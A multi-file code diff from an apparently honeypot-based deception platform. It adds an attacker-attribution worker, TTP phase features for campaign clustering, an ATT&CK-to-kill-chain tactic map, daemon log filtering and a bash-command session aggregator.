inserted += await _flush(repo, pending, dry_run)
|
||||||
|
elapsed = time.monotonic() - started
|
||||||
|
console.print(
|
||||||
|
f"source=canary rows={rows_seen} inserted={inserted} "
|
||||||
|
f"dry_run={dry_run} elapsed_s={elapsed:.2f}"
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
async def _flush(repo: Any, tags: list[Any], dry_run: bool) -> int:
|
||||||
|
if dry_run:
|
||||||
|
return 0
|
||||||
|
return int(await repo.insert_tags(tags))
|
||||||
@@ -11,7 +11,7 @@ import signal
|
|||||||
import subprocess # nosec B404
|
import subprocess # nosec B404
|
||||||
import sys
|
import sys
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
from typing import Optional
|
from typing import Any, Callable, Optional
|
||||||
|
|
||||||
import typer
|
import typer
|
||||||
from rich.console import Console
|
from rich.console import Console
|
||||||
@@ -96,7 +96,7 @@ def _is_running(match_fn) -> int | None:
|
|||||||
return None
|
return None
|
||||||
|
|
||||||
|
|
||||||
def _service_registry(log_file: str) -> list[tuple[str, callable, list[str]]]:
|
def _service_registry(log_file: str) -> list[tuple[str, Callable[..., Any], list[str]]]:
|
||||||
"""Return the microservice registry for health-check and relaunch.
|
"""Return the microservice registry for health-check and relaunch.
|
||||||
|
|
||||||
On agents these run as systemd units invoking /usr/local/bin/decnet,
|
On agents these run as systemd units invoking /usr/local/bin/decnet,
|
||||||
@@ -195,7 +195,7 @@ _DEFAULT_SWARMCTL_URL = "http://127.0.0.1:8770"
|
|||||||
|
|
||||||
|
|
||||||
def _swarmctl_base_url(url: Optional[str]) -> str:
|
def _swarmctl_base_url(url: Optional[str]) -> str:
|
||||||
return url or os.environ.get("DECNET_SWARMCTL_URL", _DEFAULT_SWARMCTL_URL)
|
return url or os.environ.get("DECNET_SWARMCTL_URL") or _DEFAULT_SWARMCTL_URL
|
||||||
|
|
||||||
|
|
||||||
def _http_request(method: str, url: str, *, json_body: Optional[dict] = None, timeout: float = 30.0):
|
def _http_request(method: str, url: str, *, json_body: Optional[dict] = None, timeout: float = 30.0):
|
||||||
|
|||||||
@@ -192,6 +192,70 @@ def register(app: typer.Typer) -> None:
|
|||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
console.print("\n[yellow]Reuse correlator stopped.[/]")
|
console.print("\n[yellow]Reuse correlator stopped.[/]")
|
||||||
|
|
||||||
|
@app.command(name="attribution")
|
||||||
|
def attribution(
|
||||||
|
multi_actor_tick_secs: float = typer.Option(
|
||||||
|
60.0, "--multi-actor-tick", "-t",
|
||||||
|
help=(
|
||||||
|
"Cross-primitive multi_actor correlator tick interval (seconds). "
|
||||||
|
"Walks attribution_state for identities flagged on >= 2 "
|
||||||
|
"primitives and emits attribution.profile.multi_actor_suspected."
|
||||||
|
),
|
||||||
|
),
|
||||||
|
daemon: bool = typer.Option(
|
||||||
|
False, "--daemon", "-d",
|
||||||
|
help="Detach to background as a daemon process",
|
||||||
|
),
|
||||||
|
) -> None:
|
||||||
|
"""Attribution engine v0 — per-(identity, primitive) state machine.
|
||||||
|
|
||||||
|
Subscribes to ``attacker.observation.>`` and, for each event,
|
||||||
|
ensures a stub identity row, runs the merger over the full
|
||||||
|
per-(identity, primitive) observation series, upserts the
|
||||||
|
derived state, and publishes
|
||||||
|
``attribution.profile.state_changed`` only on transition.
|
||||||
|
Periodic tick fires
|
||||||
|
``attribution.profile.multi_actor_suspected`` when >= 2
|
||||||
|
primitives flag the same identity.
|
||||||
|
|
||||||
|
Closes DEBT-051. Bright-line scope: behavioural coherence and
|
||||||
|
drift only — never persona attribution to natural persons.
|
||||||
|
"""
|
||||||
|
import asyncio
|
||||||
|
from decnet.correlation.attribution_worker import (
|
||||||
|
run_attribution_loop,
|
||||||
|
)
|
||||||
|
from decnet.web.dependencies import repo
|
||||||
|
|
||||||
|
if daemon:
|
||||||
|
log.info(
|
||||||
|
"attribution worker daemonizing tick=%s",
|
||||||
|
multi_actor_tick_secs,
|
||||||
|
)
|
||||||
|
_utils._daemonize()
|
||||||
|
|
||||||
|
log.info(
|
||||||
|
"attribution worker command invoked tick=%s",
|
||||||
|
multi_actor_tick_secs,
|
||||||
|
)
|
||||||
|
console.print(
|
||||||
|
f"[bold cyan]Attribution engine starting[/] "
|
||||||
|
f"multi_actor_tick={multi_actor_tick_secs}s"
|
||||||
|
)
|
||||||
|
console.print("[dim]Press Ctrl+C to stop[/]")
|
||||||
|
|
||||||
|
async def _run() -> None:
|
||||||
|
await repo.initialize()
|
||||||
|
await run_attribution_loop(
|
||||||
|
repo,
|
||||||
|
multi_actor_tick_secs=multi_actor_tick_secs,
|
||||||
|
)
|
||||||
|
|
||||||
|
try:
|
||||||
|
asyncio.run(_run())
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
console.print("\n[yellow]Attribution engine stopped.[/]")
|
||||||
|
|
||||||
@app.command(name="clusterer")
|
@app.command(name="clusterer")
|
||||||
def clusterer(
|
def clusterer(
|
||||||
poll_interval_secs: float = typer.Option(
|
poll_interval_secs: float = typer.Option(
|
||||||
@@ -295,3 +359,10 @@ def register(app: typer.Typer) -> None:
|
|||||||
asyncio.run(_run())
|
asyncio.run(_run())
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
console.print("\n[yellow]Campaign clusterer stopped.[/]")
|
console.print("\n[yellow]Campaign clusterer stopped.[/]")
|
||||||
|
|
||||||
|
# ``decnet ttp`` and ``decnet ttp-backfill`` moved to
|
||||||
|
# :mod:`decnet.cli.ttp` — the TTP CLI surface (worker + admin verbs)
|
||||||
|
# is colocated there, mirroring the per-feature CLI split used by
|
||||||
|
# :mod:`decnet.cli.canary`, :mod:`decnet.cli.webhook`, etc. The
|
||||||
|
# ``decnet-ttp.service`` systemd unit's ExecStart still resolves to
|
||||||
|
# ``decnet ttp`` because the command name is unchanged.
|
||||||
|
|||||||
@@ -66,7 +66,10 @@ def cluster_identities(
|
|||||||
return {f.identity_uuid: f"cmp-{find(f.identity_uuid)}" for f in feat_list}
|
return {f.identity_uuid: f"cmp-{find(f.identity_uuid)}" for f in feat_list}
|
||||||
|
|
||||||
|
|
||||||
def from_identity_row(row: dict[str, Any]) -> IdentityFeatures:
|
def from_identity_row(
|
||||||
|
row: dict[str, Any],
|
||||||
|
ttp_decky_phases: list[dict[str, Any]] | None = None,
|
||||||
|
) -> IdentityFeatures:
|
||||||
"""Project an ``AttackerIdentity`` projection row dict into an
|
"""Project an ``AttackerIdentity`` projection row dict into an
|
||||||
:class:`IdentityFeatures`.
|
:class:`IdentityFeatures`.
|
||||||
|
|
||||||
@@ -75,20 +78,59 @@ def from_identity_row(row: dict[str, Any]) -> IdentityFeatures:
|
|||||||
ja3_hashes / hassh_hashes / payload_simhashes / c2_endpoints
|
ja3_hashes / hassh_hashes / payload_simhashes / c2_endpoints
|
||||||
(JSON list[str] or null).
|
(JSON list[str] or null).
|
||||||
|
|
||||||
Phase-handoff fields stay empty until the production-row adapter
|
*ttp_decky_phases* is the optional per-identity payload from
|
||||||
learns to mine logs for per-decky phase sequences (TODO.md
|
:meth:`BaseRepository.list_ttp_decky_phases` — one row per
|
||||||
"production-side payload + C2 + commands joins"). Without those,
|
``ttp_tag`` carrying ``(decky_id, tactic, created_at_ts)``. When
|
||||||
the campaign clusterer falls back to shared-infra + temporal
|
provided, the adapter projects ``tactic`` → :class:`UKCPhase` and
|
||||||
overlap + cohort signals on production data; the fixture path
|
populates :attr:`IdentityFeatures.first_phase_per_decky` /
|
||||||
exercises the full feature set via :func:`from_synthetic_identity`.
|
``last_phase_per_decky`` / ``first_seen_per_decky`` /
|
||||||
|
``last_seen_per_decky` so the production phase-handoff edge
|
||||||
|
finally fires. The synthetic fixture path
|
||||||
|
(:func:`from_synthetic_identity`) is unchanged — fixtures keep
|
||||||
|
emitting UKC directly.
|
||||||
"""
|
"""
|
||||||
|
from decnet.clustering.ukc import tactic_to_ukc_phase # noqa: PLC0415
|
||||||
|
|
||||||
payload_hashes = _parse_json_list(row.get("payload_simhashes"))
|
payload_hashes = _parse_json_list(row.get("payload_simhashes"))
|
||||||
c2_endpoints = _parse_json_list(row.get("c2_endpoints"))
|
c2_endpoints = _parse_json_list(row.get("c2_endpoints"))
|
||||||
|
|
||||||
|
first_phase_per_decky: dict[str, str] = {}
|
||||||
|
last_phase_per_decky: dict[str, str] = {}
|
||||||
|
first_seen_per_decky: dict[str, float] = {}
|
||||||
|
last_seen_per_decky: dict[str, float] = {}
|
||||||
|
decky_set: set[str] = set()
|
||||||
|
|
||||||
|
# Rows arrive ordered by ``created_at``; ``setdefault`` preserves
|
||||||
|
# the FIRST observation per decky, plain assignment captures the
|
||||||
|
# LAST. Tags whose tactic is outside the ATT&CK→UKC map (or whose
|
||||||
|
# phase is pre-target / unobservable) are dropped — they should
|
||||||
|
# not be assigned by any rule per TTP_TAGGING.md §UKC bridge.
|
||||||
|
for entry in ttp_decky_phases or []:
|
||||||
|
decky = entry.get("decky_id")
|
||||||
|
tactic = entry.get("tactic")
|
||||||
|
created_at_ts = entry.get("created_at_ts")
|
||||||
|
if not isinstance(decky, str) or not isinstance(tactic, str):
|
||||||
|
continue
|
||||||
|
phase = tactic_to_ukc_phase(tactic)
|
||||||
|
if phase is None:
|
||||||
|
continue
|
||||||
|
ts = float(created_at_ts) if isinstance(
|
||||||
|
created_at_ts, (int, float)) else 0.0
|
||||||
|
decky_set.add(decky)
|
||||||
|
first_phase_per_decky.setdefault(decky, phase.value)
|
||||||
|
last_phase_per_decky[decky] = phase.value
|
||||||
|
first_seen_per_decky.setdefault(decky, ts)
|
||||||
|
last_seen_per_decky[decky] = ts
|
||||||
|
|
||||||
return IdentityFeatures(
|
return IdentityFeatures(
|
||||||
identity_uuid=row["uuid"],
|
identity_uuid=row["uuid"],
|
||||||
payload_hashes=frozenset(payload_hashes),
|
payload_hashes=frozenset(payload_hashes),
|
||||||
c2_endpoints=frozenset(c2_endpoints),
|
c2_endpoints=frozenset(c2_endpoints),
|
||||||
|
decky_set=frozenset(decky_set),
|
||||||
|
first_phase_per_decky=first_phase_per_decky,
|
||||||
|
last_phase_per_decky=last_phase_per_decky,
|
||||||
|
first_seen_per_decky=first_seen_per_decky,
|
||||||
|
last_seen_per_decky=last_seen_per_decky,
|
||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
@@ -132,8 +174,26 @@ class ConnectedComponentsCampaignClusterer(CampaignClusterer):
|
|||||||
# merged out — their winner is the active row and gets clustered
|
# merged out — their winner is the active row and gets clustered
|
||||||
# on its own. This keeps the campaign graph from double-counting.
|
# on its own. This keeps the campaign graph from double-counting.
|
||||||
active_rows = [r for r in rows if not r.get("merged_into_uuid")]
|
active_rows = [r for r in rows if not r.get("merged_into_uuid")]
|
||||||
|
# Pull TTP-derived per-decky phase observations per identity
|
||||||
|
# (E.3.15). Failures here are non-fatal — the clusterer falls
|
||||||
|
# back to the empty phase-handoff signal, same as the legacy
|
||||||
|
# behavior, so a partial repo doesn't take the worker down.
|
||||||
|
decky_phases_by_identity: dict[str, list[dict[str, Any]]] = {}
|
||||||
|
for r in active_rows:
|
||||||
|
try:
|
||||||
|
decky_phases_by_identity[r["uuid"]] = (
|
||||||
|
await repo.list_ttp_decky_phases(r["uuid"])
|
||||||
|
)
|
||||||
|
except Exception: # noqa: BLE001
|
||||||
|
log.warning(
|
||||||
|
"campaign clusterer: list_ttp_decky_phases failed "
|
||||||
|
"for identity %s; phase-handoff edge inert",
|
||||||
|
r["uuid"],
|
||||||
|
)
|
||||||
|
decky_phases_by_identity[r["uuid"]] = []
|
||||||
feature_list: list[IdentityFeatures] = [
|
feature_list: list[IdentityFeatures] = [
|
||||||
from_identity_row(r) for r in active_rows
|
from_identity_row(r, decky_phases_by_identity.get(r["uuid"]))
|
||||||
|
for r in active_rows
|
||||||
]
|
]
|
||||||
row_by_uuid: dict[str, dict[str, Any]] = {
|
row_by_uuid: dict[str, dict[str, Any]] = {
|
||||||
r["uuid"]: r for r in active_rows
|
r["uuid"]: r for r in active_rows
|
||||||
|
|||||||
@@ -342,7 +342,7 @@ def combined_campaign_weight(
|
|||||||
# ─── Adapter for synthetic-fixture tests ────────────────────────────────────
|
# ─── Adapter for synthetic-fixture tests ────────────────────────────────────
|
||||||
|
|
||||||
|
|
||||||
def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures: # type: ignore[no-untyped-def]
|
def from_synthetic_identity(att, identity_uuid: Optional[str] = None) -> IdentityFeatures:
|
||||||
"""Build an :class:`IdentityFeatures` from a ``SyntheticAttacker``.
|
"""Build an :class:`IdentityFeatures` from a ``SyntheticAttacker``.
|
||||||
|
|
||||||
Treats one ``SyntheticAttacker`` as one identity — adequate for
|
Treats one ``SyntheticAttacker`` as one identity — adequate for
|
||||||
|
|||||||
@@ -105,11 +105,11 @@ async def run_campaign_clusterer_loop(
|
|||||||
t.cancel()
|
t.cancel()
|
||||||
if heartbeat_task is not None:
|
if heartbeat_task is not None:
|
||||||
heartbeat_task.cancel()
|
heartbeat_task.cancel()
|
||||||
for t in (*wake_tasks, heartbeat_task):
|
for task in (*wake_tasks, heartbeat_task):
|
||||||
if t is None:
|
if task is None:
|
||||||
continue
|
continue
|
||||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||||
await t
|
await task
|
||||||
if bus is not None:
|
if bus is not None:
|
||||||
with contextlib.suppress(Exception):
|
with contextlib.suppress(Exception):
|
||||||
await bus.close()
|
await bus.close()
|
||||||
|
|||||||
@@ -363,8 +363,9 @@ async def _roll_up_fingerprints(
|
|||||||
breaks the clusterer tick — the columns just stay stale until the
|
breaks the clusterer tick — the columns just stay stale until the
|
||||||
next pass."""
|
next pass."""
|
||||||
summaries = extract_fp_summaries(member_rows)
|
summaries = extract_fp_summaries(member_rows)
|
||||||
|
fp_kwargs = {k: v for k, v in summaries.items() if k in {"ja3_hashes", "hassh_hashes", "tls_cert_sha256"}}
|
||||||
try:
|
try:
|
||||||
await repo.update_identity_fingerprints(identity_uuid, **summaries)
|
await repo.update_identity_fingerprints(identity_uuid, **fp_kwargs)
|
||||||
except Exception: # noqa: BLE001
|
except Exception: # noqa: BLE001
|
||||||
log.exception(
|
log.exception(
|
||||||
"clusterer: failed to roll up fingerprints for identity=%s",
|
"clusterer: failed to roll up fingerprints for identity=%s",
|
||||||
|
|||||||
@@ -265,7 +265,7 @@ def combined_edge_weight(a: Observation, b: Observation) -> float:
|
|||||||
# ─── Adapter for the synthetic-corpus tests ─────────────────────────────────
|
# ─── Adapter for the synthetic-corpus tests ─────────────────────────────────
|
||||||
|
|
||||||
|
|
||||||
def from_synthetic(att) -> Observation: # type: ignore[no-untyped-def]
|
def from_synthetic(att) -> Observation:
|
||||||
"""Build an :class:`Observation` from a ``SyntheticAttacker``.
|
"""Build an :class:`Observation` from a ``SyntheticAttacker``.
|
||||||
|
|
||||||
Lives here so test code doesn't import the factory shape into the
|
Lives here so test code doesn't import the factory shape into the
|
||||||
|
|||||||
@@ -15,6 +15,7 @@ emits no events for unobservable phases.
|
|||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
from enum import Enum
|
from enum import Enum
|
||||||
|
from typing import Final
|
||||||
|
|
||||||
|
|
||||||
class UKCPhase(str, Enum):
|
class UKCPhase(str, Enum):
|
||||||
@@ -106,3 +107,96 @@ def stage_of(phase: UKCPhase) -> str:
|
|||||||
if phase in STAGE_THROUGH:
|
if phase in STAGE_THROUGH:
|
||||||
return "through"
|
return "through"
|
||||||
return "out"
|
return "out"
|
||||||
|
|
||||||
|
|
||||||
|
# MITRE ATT&CK tactic ID -> UKC phase. Covers the 14 enterprise tactics
|
||||||
|
# plus the four ICS tactics referenced by Appendix A.7 (Conpot, MQTT).
|
||||||
|
# Adding additional ICS tactics is a one-line addition. See
|
||||||
|
# TTP_TAGGING.md "UKC bridge".
|
||||||
|
ATTACK_TACTIC_TO_UKC: dict[str, UKCPhase] = {
|
||||||
|
# Enterprise
|
||||||
|
"TA0043": UKCPhase.RECONNAISSANCE, # Reconnaissance
|
||||||
|
"TA0042": UKCPhase.RESOURCE_DEVELOPMENT, # Resource Development
|
||||||
|
"TA0001": UKCPhase.DELIVERY, # Initial Access
|
||||||
|
"TA0002": UKCPhase.EXECUTION, # Execution
|
||||||
|
"TA0003": UKCPhase.PERSISTENCE, # Persistence
|
||||||
|
"TA0004": UKCPhase.PRIVILEGE_ESCALATION, # Privilege Escalation
|
||||||
|
"TA0005": UKCPhase.DEFENSE_EVASION, # Defense Evasion
|
||||||
|
"TA0006": UKCPhase.CREDENTIAL_ACCESS, # Credential Access
|
||||||
|
"TA0007": UKCPhase.DISCOVERY, # Discovery
|
||||||
|
"TA0008": UKCPhase.LATERAL_MOVEMENT, # Lateral Movement
|
||||||
|
"TA0009": UKCPhase.COLLECTION, # Collection
|
||||||
|
"TA0011": UKCPhase.COMMAND_AND_CONTROL, # Command and Control
|
||||||
|
"TA0010": UKCPhase.EXFILTRATION, # Exfiltration
|
||||||
|
"TA0040": UKCPhase.IMPACT, # Impact
|
||||||
|
# ICS — first-class projection so MQTT / Conpot / Modbus tags
|
||||||
|
# don't drop out of campaign rollups when the clusterer projects
|
||||||
|
# tactic to phase. ICS uses an independent tactic-ID range.
|
||||||
|
"TA0100": UKCPhase.COLLECTION, # ICS: Collection
|
||||||
|
"TA0102": UKCPhase.DISCOVERY, # ICS: Discovery
|
||||||
|
"TA0105": UKCPhase.IMPACT, # ICS: Impact
|
||||||
|
"TA0106": UKCPhase.IMPACT, # ICS: Impair Process Control
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
# ICS tactics live in a separate STIX bundle (mitre/ics-attack) that
|
||||||
|
# DECNET does not currently load. They're exempt from the
|
||||||
|
# enterprise-bundle validation in :func:`validate_against_attack_bundle`
|
||||||
|
# so a startup check doesn't false-fail the moment ICS rules are wired.
|
||||||
|
_NON_ENTERPRISE_TACTICS: Final[frozenset[str]] = frozenset(
|
||||||
|
{"TA0100", "TA0102", "TA0105", "TA0106"}
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def validate_against_attack_bundle() -> None:
|
||||||
|
"""Assert every enterprise tactic ID in :data:`ATTACK_TACTIC_TO_UKC` resolves in the loaded STIX bundle.
|
||||||
|
|
||||||
|
Called at startup (see :mod:`decnet.ttp.impl.rule_engine`) so a
|
||||||
|
typoed tactic ID surfaces as a fail-closed boot, not a silent
|
||||||
|
miss in campaign rollups.
|
||||||
|
"""
|
||||||
|
from decnet.ttp.attack_stix import assert_known_tactic_ids
|
||||||
|
|
||||||
|
assert_known_tactic_ids(
|
||||||
|
list(ATTACK_TACTIC_TO_UKC.keys()),
|
||||||
|
source="decnet.clustering.ukc.ATTACK_TACTIC_TO_UKC",
|
||||||
|
exempt=set(_NON_ENTERPRISE_TACTICS),
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def tactic_to_ukc_phase(tactic: str) -> UKCPhase | None:
|
||||||
|
"""Map an ATT&CK tactic ID (e.g. ``"TA0001"``) to a :class:`UKCPhase`.
|
||||||
|
|
||||||
|
Returns ``None`` for unknown tactics. The map is closed-over the
|
||||||
|
enterprise + ICS tactics referenced by the rule pack; a tactic
|
||||||
|
outside that set is a contributor bug, not a runtime miss.
|
||||||
|
"""
|
||||||
|
return ATTACK_TACTIC_TO_UKC.get(tactic)
|
||||||
|
|
||||||
|
|
||||||
|
# Inverse map, built once at import time. Several enterprise tactics
|
||||||
|
# would collide (e.g. both TA0009 and TA0100 map to COLLECTION); the
|
||||||
|
# enterprise tactic wins because it's listed first in
|
||||||
|
# ATTACK_TACTIC_TO_UKC, which dict comprehension preserves via
|
||||||
|
# last-write semantics — so we iterate in reverse to keep the FIRST
|
||||||
|
# occurrence per phase. Pre-target phases (RECONNAISSANCE,
|
||||||
|
# RESOURCE_DEVELOPMENT, WEAPONIZATION, SOCIAL_ENGINEERING) that are
|
||||||
|
# not in OBSERVABLE_PHASES are deliberately lossy on the inverse —
|
||||||
|
# TTP tags must never assign them, so projecting back to a tactic
|
||||||
|
# is undefined. See TTP_TAGGING.md §UKC bridge.
|
||||||
|
_UKC_TO_TACTIC: dict[UKCPhase, str] = {
|
||||||
|
phase: tactic
|
||||||
|
for tactic, phase in reversed(list(ATTACK_TACTIC_TO_UKC.items()))
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
def ukc_phase_to_tactic(phase: UKCPhase) -> str | None:
|
||||||
|
"""Map a :class:`UKCPhase` back to an ATT&CK tactic ID.
|
||||||
|
|
||||||
|
Lossy on phases outside :data:`OBSERVABLE_PHASES` — pre-target
|
||||||
|
phases (e.g. ``RECONNAISSANCE``, ``WEAPONIZATION``) return
|
||||||
|
``None`` because no rule emits them, so the inverse is
|
||||||
|
undefined by design. The CDD test in E.2.9 pins which phases
|
||||||
|
are lossy.
|
||||||
|
"""
|
||||||
|
return _UKC_TO_TACTIC.get(phase)
|
||||||
|
|||||||
@@ -115,11 +115,11 @@ async def run_clusterer_loop(
|
|||||||
t.cancel()
|
t.cancel()
|
||||||
if heartbeat_task is not None:
|
if heartbeat_task is not None:
|
||||||
heartbeat_task.cancel()
|
heartbeat_task.cancel()
|
||||||
for t in (*wake_tasks, heartbeat_task):
|
for task in (*wake_tasks, heartbeat_task):
|
||||||
if t is None:
|
if task is None:
|
||||||
continue
|
continue
|
||||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||||
await t
|
await task
|
||||||
if bus is not None:
|
if bus is not None:
|
||||||
with contextlib.suppress(Exception):
|
with contextlib.suppress(Exception):
|
||||||
await bus.close()
|
await bus.close()
|
||||||
|
|||||||
@@ -18,6 +18,7 @@ from datetime import datetime
|
|||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
from typing import Any, Callable, Optional
|
from typing import Any, Callable, Optional
|
||||||
|
|
||||||
|
from decnet.artifacts.shards import find_shard_with_sid
|
||||||
from decnet.bus import topics as _topics
|
from decnet.bus import topics as _topics
|
||||||
from decnet.bus.factory import get_bus
|
from decnet.bus.factory import get_bus
|
||||||
from decnet.bus.publish import (
|
from decnet.bus.publish import (
|
||||||
@@ -75,6 +76,21 @@ _RL_EVENT_TYPES: frozenset[str] = frozenset(
|
|||||||
)
|
)
|
||||||
_RL_MAX_ENTRIES: int = 10_000
|
_RL_MAX_ENTRIES: int = 10_000
|
||||||
|
|
||||||
|
# APP-NAMEs we never want to see in the ingestion stream — native unix
|
||||||
|
# daemons that share a container with a DECNET service. Their logs are
|
||||||
|
# noise: sshd's "Failed password for root from X" duplicates the
|
||||||
|
# auth-helper's structured `auth_attempt` event, pam_unix repeats it
|
||||||
|
# again, and CRON/systemd/etc. say nothing about attacker behavior.
|
||||||
|
# Override or extend with DECNET_COLLECTOR_DROP_APPS (comma list).
|
||||||
|
_DROP_APPS: frozenset[str] = frozenset(
|
||||||
|
a.strip()
|
||||||
|
for a in os.environ.get(
|
||||||
|
"DECNET_COLLECTOR_DROP_APPS",
|
||||||
|
"sshd,pam_unix,sudo,su,CRON,cron,systemd,kernel,rsyslogd,dbus-daemon",
|
||||||
|
).split(",")
|
||||||
|
if a.strip()
|
||||||
|
)
|
||||||
|
|
||||||
_rl_lock: threading.Lock = threading.Lock()
|
_rl_lock: threading.Lock = threading.Lock()
|
||||||
_rl_last: dict[tuple[str, str, str, str], float] = {}
|
_rl_last: dict[tuple[str, str, str, str], float] = {}
|
||||||
|
|
||||||
@@ -82,10 +98,11 @@ _rl_last: dict[tuple[str, str, str, str], float] = {}
|
|||||||
def _should_ingest(parsed: dict[str, Any]) -> bool:
|
def _should_ingest(parsed: dict[str, Any]) -> bool:
|
||||||
"""
|
"""
|
||||||
Return True if this parsed event should be written to the JSON ingestion
|
Return True if this parsed event should be written to the JSON ingestion
|
||||||
stream. Rate-limited connection-lifecycle events return False when another
|
stream. Drops native unix daemon noise (sshd, pam_unix, …) outright;
|
||||||
event with the same (attacker_ip, decky, service, event_type) was emitted
|
rate-limits connection-lifecycle events within a dedup window.
|
||||||
inside the dedup window.
|
|
||||||
"""
|
"""
|
||||||
|
if parsed.get("service", "") in _DROP_APPS:
|
||||||
|
return False
|
||||||
event_type = parsed.get("event_type", "")
|
event_type = parsed.get("event_type", "")
|
||||||
if _RL_WINDOW_SEC <= 0.0 or event_type not in _RL_EVENT_TYPES:
|
if _RL_WINDOW_SEC <= 0.0 or event_type not in _RL_EVENT_TYPES:
|
||||||
return True
|
return True
|
||||||
@@ -116,6 +133,234 @@ def _reset_rate_limiter() -> None:
|
|||||||
with _rl_lock:
|
with _rl_lock:
|
||||||
_rl_last.clear()
|
_rl_last.clear()
|
||||||
|
|
||||||
|
|
||||||
|
# ─── Session aggregator (TTP `attacker.session.ended` producer) ──────────────
|
||||||
|
#
|
||||||
|
# The TTP worker subscribes to ``attacker.session.ended`` and turns each
|
||||||
|
# emitted command into a ``source_kind="command"`` :class:`TaggerEvent`
|
||||||
|
# (see ``decnet/ttp/worker._build_events``). No upstream worker was
|
||||||
|
# producing that topic — the rule pack therefore never fired on live
|
||||||
|
# traffic. The aggregator below indexes shell-command events
|
||||||
|
# per-attacker_ip and emits one ``attacker.session.ended`` envelope
|
||||||
|
# whenever the SSH ``sessrec`` worker publishes ``session_recorded``.
|
||||||
|
#
|
||||||
|
# Memory bound: each attacker_ip's deque is capped by a TTL eviction
|
||||||
|
# (default 3600 s). Override via ``DECNET_COLLECTOR_SESSION_AGG_TTL_SEC``.
|
||||||
|
|
||||||
|
_SESSION_AGG_TTL_SEC: float = _parse_float_env(
|
||||||
|
"DECNET_COLLECTOR_SESSION_AGG_TTL_SEC", 3600.0,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
# Body of a bash PROMPT_COMMAND CMD line:
|
||||||
|
# ``CMD uid=0 user=root src=192.168.1.5 pwd=/root cmd=ls /var/www/html``
|
||||||
|
# Splits into the structured fields the inspector renders + the
|
||||||
|
# residual ``cmd=`` value (which may itself contain spaces — preserve
|
||||||
|
# everything after ``cmd=`` as one token, do NOT word-split).
|
||||||
|
_CMD_BODY_HEAD_KV_RE = re.compile(r'(\w+)=(\S+)')
|
||||||
|
|
||||||
|
|
||||||
|
def _parse_cmd_msg(msg: str) -> dict[str, str]:
|
||||||
|
"""Split a bash CMD msg body into ``{uid, user, src, pwd, command}``.
|
||||||
|
|
||||||
|
Returns the empty dict on a non-CMD msg. ``command`` carries the
|
||||||
|
full post-``cmd=`` rest, including any embedded whitespace —
|
||||||
|
tools like ``nmap -p- 192.168.1.0/24`` would otherwise lose
|
||||||
|
everything after the first space.
|
||||||
|
"""
|
||||||
|
if not msg.startswith("CMD "):
|
||||||
|
return {}
|
||||||
|
head, sep, cmd_rest = msg[4:].partition("cmd=")
|
||||||
|
out: dict[str, str] = {}
|
||||||
|
for k, v in _CMD_BODY_HEAD_KV_RE.findall(head):
|
||||||
|
out[k] = v
|
||||||
|
if sep:
|
||||||
|
out["command"] = cmd_rest
|
||||||
|
return out
|
||||||
|
|
||||||
|
|
||||||
|
def _parse_iso_ts(value: str) -> Optional[datetime]:
|
||||||
|
"""Best-effort ISO-8601 parse for parsed event timestamps.
|
||||||
|
|
||||||
|
The collector's parser stamps ``timestamp`` either as the original
|
||||||
|
ISO-8601 string (when ``datetime.fromisoformat`` failed) or as the
|
||||||
|
reformatted ``%Y-%m-%d %H:%M:%S`` string. Both round-trip through
|
||||||
|
``fromisoformat`` after a space→T swap. Returns None if neither
|
||||||
|
shape parses — the aggregator skips events it can't time-stamp.
|
||||||
|
"""
|
||||||
|
if not value:
|
||||||
|
return None
|
||||||
|
candidates = (value, value.replace(" ", "T"))
|
||||||
|
for cand in candidates:
|
||||||
|
try:
|
||||||
|
return datetime.fromisoformat(cand)
|
||||||
|
except ValueError:
|
||||||
|
continue
|
||||||
|
return None
|
||||||
|
|
||||||
|
|
||||||
|
class _SessionAggregator:
|
||||||
|
"""Per-attacker_ip command index that emits ``attacker.session.ended``.
|
||||||
|
|
||||||
|
Thread-safe — :meth:`add_event` is called from the per-container
|
||||||
|
stream threads. Internal state is protected by a single lock; the
|
||||||
|
publish fan-out happens inside the lock for simplicity (the
|
||||||
|
downstream publish_fn is the thread-safe marshaller from
|
||||||
|
:mod:`decnet.bus.publish`, which is non-blocking).
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(
|
||||||
|
self,
|
||||||
|
publish_fn: Callable[[str, dict[str, Any], str], None],
|
||||||
|
*,
|
||||||
|
ttl_sec: float = _SESSION_AGG_TTL_SEC,
|
||||||
|
) -> None:
|
||||||
|
self._publish = publish_fn
|
||||||
|
self._ttl = ttl_sec
|
||||||
|
self._lock = threading.Lock()
|
||||||
|
# attacker_ip → list of (timestamp, parsed_event) tuples.
|
||||||
|
# Stored as a list rather than a deque so the ``in_window``
|
||||||
|
# filter can index linearly; the per-attacker volume is
|
||||||
|
# bounded by the TTL and by typical session size (≤ a few
|
||||||
|
# hundred commands) so this stays cheap.
|
||||||
|
self._cmds: dict[str, list[tuple[datetime, dict[str, Any]]]] = {}
|
||||||
|
|
||||||
|
def add_event(self, parsed: dict[str, Any]) -> None:
|
||||||
|
"""Index a parsed event. Emits on ``session_recorded``."""
|
||||||
|
event_type = parsed.get("event_type", "")
|
||||||
|
attacker_ip = parsed.get("attacker_ip") or ""
|
||||||
|
if not attacker_ip or attacker_ip == "Unknown":
|
||||||
|
return
|
||||||
|
ts = _parse_iso_ts(str(parsed.get("timestamp", "")))
|
||||||
|
if ts is None:
|
||||||
|
return
|
||||||
|
with self._lock:
|
||||||
|
self._evict_expired(ts)
|
||||||
|
